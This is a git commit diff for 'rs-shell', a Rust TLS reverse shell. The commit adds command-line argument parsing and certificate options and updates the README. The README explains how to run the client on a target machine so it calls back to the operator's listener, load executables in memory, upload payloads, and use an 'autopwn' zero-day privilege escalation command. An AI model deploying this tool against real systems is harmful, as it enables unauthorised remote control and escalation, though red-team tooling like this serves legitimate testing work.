Improve parameters parsing and README explains

BlWasp · BlWasp · commit 66b6e98401f9 · 2023-06-28T00:28:14.000+02:00
Implement parameters parsing with the 'clap' crate
Add two new parameters for the TLS certificate
Improve README
diff --git a/Cargo.toml b/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "rs-shell"
-version = "0.1.0"
+version = "0.1.1"
 edition = "2021"
 
 # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
@@ -14,6 +14,7 @@ open = "4.1.0"
 simple_logger = "4.1.0"
 log = "0.4.18"
 ctrlc = "3.4.0"
+clap = { version = "4.3.8", features = ["derive"] }
 
 [dependencies.windows-sys]
 version = "0.48"
diff --git a/README.md b/README.md
@@ -31,17 +31,22 @@ For the moment, the following features are present:
 
 ### Setup
 
-First of all, the full path of your TLS certificate and its password must be configured in the file `server.rs` in place of the tags `[CERTFICATE_PATH]` and `[CERTIFICATE_PASSWORD]`.
-
-Additionally, I have set a `dummy` domain for hostname validation in the `connect()` function for both clients. If you use a signed certificate for a real server, you can change it and remove the unsecure functions that remove hostname and certs validations.
+I have set a `dummy` domain for hostname validation in the `connect()` function for both clients. If you use a signed certificate for a real server, you can change it and remove the unsecure functions that remove hostname and certs validations.
 
 By default, only the `error`, `warn` and `info` logs are displayed. If you also need the `debug` ones (can be usefull for the loading features), you can change this in `main.rs` by modifying `::log::set_max_level(LevelFilter::Info);` to `::log::set_max_level(LevelFilter::Debug);`.
 
+A new self-signed TLS certificate can be obtained like this :
+
+```bash
+openssl req -newkey rsa:2048 -nodes -keyout private.key -x509 -days 365 -out certificate.cer
+openssl pkcs12 -export -out certificate.pfx -inkey private.key -in certificate.cr
+```
+
 ### Compilation
 
-The project can be compiled with `cargo build --release` on Windows or Linux and the binary will be present in `target/release/`.
+The project can be compiled with `cargo build --release` on Windows or Linux and the binary will be present in `target/release/`, or the target name if a target is specified.
 
-Tu compile for a different target than your current OS you can use `cargo build --release --target x86_64-unknown-linux-gnu`.
+Tu compile for a different target than your current OS you can use, for example, `cargo build --release --target x86_64-unknown-linux-gnu` (be sure to use the appropriate toolchain and to have all the required dependencies).
 
 The project compilation has been tested with the following Rust toolchains :
 
@@ -55,20 +60,23 @@ Should run on all Windows and Linux versions (I have hope).
 ### Usage
 
 ```plain
-Usage : shell.exe [l | c] IP port
-
-    l       launch the listener application
-    c       launch the client application
-
-    IP      IP address to bind to for the listener, or to connect to for the client
-    port    port address to bind to for the listener, or to connect to for the client
-
-    In a session, type 'help' for advanced integrated commands
+Usage: rs-shell.exe [OPTIONS] --side <side> --ip <ip> --port <port>
+
+Options:
+  -s, --side <side>            launch the client or the listener [possible values: c, l]
+  -i, --ip <ip>                IP address to bind to for the listener, or to connect to for the clien
+  -p, --port <port>            port address to bind to for the listener, or to connect to for the client
+      --cert-path <cert_path>  path of the TLS certificate (in PFX or PKCS12 format) for the server
+      --cert-pass <cert_pass>  password of the TLS certificate for the server
+  -h, --help                   Print help
+  -V, --version                Print version
+
+In a session, type 'help' for advanced integrated commands
 ```
 
-To obtain a session, just launch the binary in listener mode on your machine with `rs-shell.exe l IP_to_bind_to port_to_bind_to`. For example `rs-shell.exe l 0.0.0.0 4545`.
+To obtain a session, just launch the binary in listener mode on your machine with `rs-shell.exe -s l -i IP_to_bind_to -p port_to_bind_to --cert-path certificate_path --cert-pass certificate_password`. For example `rs-shell.exe -s l -i 0.0.0.0 -p 4545 --cert-path certificate.pfx --cert-pass "Password"`.
 
-Then, on the target machine launch the client to connect back to your server with `rs-shell.exe c IP_to_connect_to port_to_connect_to`. For example `rs-shell.exe c 192.168.1.10 4545`.
+Then, on the target machine launch the client to connect back to your server with `rs-shell.exe -s c -i IP_to_connect_to -p port_to_connect_to`. For example `rs-shell.exe -s c --ip 192.168.1.10 --port 4545`.
 
 ### Advanced commands
 
@@ -96,7 +104,7 @@ Then, on the target machine launch the client to connect back to your server wit
 
     [+] Special commands
     > autopwn
-        escalate to the SYSTEM account from any local account by exploiting a zero day
+        escalate to the SYSTEM or root account from any local account by exploiting a zero day
 ```
 
 The `load` commands permit to load and execute directly in memory:
@@ -113,7 +121,7 @@ For example : `> load -h C:\Windows\System32\calc.exe C:\Windows\System32\cmd.ex
 
 `upload` permits to upload a file on the client machine. For example `upload ./pwn.exe C:\Temp\pwn.exe`.
 
-`autopwn` permits to escalate to the **SYSTEM account** with a 0day exploitation. Just type `autopwn` and answer the question.
+`autopwn` permits to escalate to the **SYSTEM or root account** with a 0day exploitation. Just type `autopwn` and answer the question.
 
 ## Todo
 
diff --git a/src/main.rs b/src/main.rs
@@ -12,10 +12,10 @@ mod server;
 
 use crate::client::client;
 use crate::server::server;
+use clap::{Arg, Command};
 use log::LevelFilter;
 use simple_logger::SimpleLogger;
 use std::error::Error;
-use std::env;
 
 fn main() -> Result<(), Box<dyn Error>> {
     SimpleLogger::new()
@@ -25,29 +25,80 @@ fn main() -> Result<(), Box<dyn Error>> {
         .unwrap();
     ::log::set_max_level(LevelFilter::Info);
 
-    let args: Vec<String> = env::args().collect();
-    if args.len() < 4 {
-        log::warn!("{}", help());
-        std::process::exit(1);
-    }
+    let args = Command::new("rs-shell")
+        .author("BlackWasp")
+        .version("0.1.1")
+        .after_help("In a session, type 'help' for advanced integrated commands")
+        .arg(
+            Arg::new("side")
+                .short('s')
+                .long("side")
+                .required(true)
+                .value_parser([
+                    clap::builder::PossibleValue::new("c"),
+                    clap::builder::PossibleValue::new("l"),
+                ])
+                .help("launch the client or the listener"),
+        )
+        .arg(
+            Arg::new("ip")
+                .short('i')
+                .long("ip")
+                .required(true)
+                .help("IP address to bind to for the listener, or to connect to for the clien"),
+        )
+        .arg(
+            Arg::new("port")
+                .short('p')
+                .long("port")
+                .required(true)
+                .help("port address to bind to for the listener, or to connect to for the client"),
+        )
+        .arg(
+            Arg::new("cert_path")
+                .long("cert-path")
+                .requires_if("side", "l")
+                .help("path of the TLS certificate (in PFX or PKCS12 format) for the server"),
+        )
+        .arg(
+            Arg::new("cert_pass")
+                .long("cert-pass")
+                .requires_if("side", "l")
+                .help("password of the TLS certificate for the server"),
+        )
+        .get_matches();
 
-    if args[1] == "l" {
-        match server(&args[2], args[3].parse::<u16>().unwrap()) {
+    if args.get_one::<String>("side").unwrap() == "l" {
+        match server(
+            args.get_one::<String>("ip").unwrap().as_str(),
+            args.get_one::<String>("port")
+                .unwrap()
+                .parse::<u16>()
+                .unwrap(),
+            args.get_one::<String>("cert_path").unwrap().as_str(),
+            args.get_one::<String>("cert_pass").unwrap().as_str(),
+        ) {
             Ok(_) => (),
             Err(r) => {
                 log::error!("Error starting the server : {}", r);
                 return Err(r);
             }
         }
-    } else if args[1] == "c" {
-        match client(&args[2], &args[3]) {
+    } else if args.get_one::<String>("side").unwrap() == "c" {
+        match client(
+            args.get_one::<String>("ip").unwrap().as_str(),
+            args.get_one::<String>("port").unwrap().as_str(),
+        ) {
             Ok(_) => (),
             Err(r) => {
                 log::debug!(
                     "Error during client execution : {}. Attempt to restart it",
                     r
                 );
-                match client(&args[2], &args[3]) {
+                match client(
+                    args.get_one::<String>("ip").unwrap().as_str(),
+                    args.get_one::<String>("port").unwrap().as_str(),
+                ) {
                     Ok(_) => (),
                     Err(r) => {
                         log::debug!("Error still present : {}", r);
@@ -60,18 +111,3 @@ fn main() -> Result<(), Box<dyn Error>> {
 
     Ok(())
 }
-
-fn help() -> String {
-    return "options missing
-    Usage : shell.exe [l | c] IP port
-
-    l       launch the listener application
-    c       launch the client application
-
-    IP      IP address to bind to for the listener, or to connect to for the client
-    port    port address to bind to for the listener, or to connect to for the client
-
-    In a session, type 'help' for advanced integrated commands
-    "
-    .to_string();
-}
diff --git a/src/server.rs b/src/server.rs
@@ -14,9 +14,9 @@ use crate::autopwn;
 
 static PATH_REGEX: &str = r#"PS (?<ParentPath>(?:[a-zA-Z]\:|\\\\[\w\s\.\-]+\\[^\/\\<>:"|?\n\r]+)\\(?:[^\/\\<>:"|?\n\r]+\\)*)(?<BaseName>[^\/\\<>:"|?\n\r]*?)> "#;
 
-pub fn server(i: &str, p: u16) -> Result<(), Box<dyn Error>> {
+pub fn server(i: &str, port: u16, cert_path: &str, cert_pass: &str) -> Result<(), Box<dyn Error>> {
     // Read TLS certificate and create identity from it
-    let file = File::open(r#"[CERTFICATE_PATH]"#);
+    let file = File::open(cert_path);
     let mut file = match file {
         Ok(f) => f,
         Err(_) => {
@@ -27,11 +27,10 @@ pub fn server(i: &str, p: u16) -> Result<(), Box<dyn Error>> {
 
     let mut identity = vec![];
     file.read_to_end(&mut identity)?;
-    let identity = Identity::from_pkcs12(&identity, "[CERTIFICATE_PASSWORD]")?;
+    let identity = Identity::from_pkcs12(&identity, cert_pass)?;
 
     // Addr and port where server will bind
     let ip = i.parse::<Ipv4Addr>();
-    let port: u16 = p;
     let ip_addr = match ip {
         Ok(i) => i,
         Err(r) => {
@@ -482,7 +481,7 @@ fn help() -> String {
 
     [+] Special commands
     > autopwn
-        escalate to the SYSTEM account from any local account by exploiting a zero day
+        escalate to the SYSTEM or root account from any local account by exploiting a zero day
     ".to_string();
 }
 
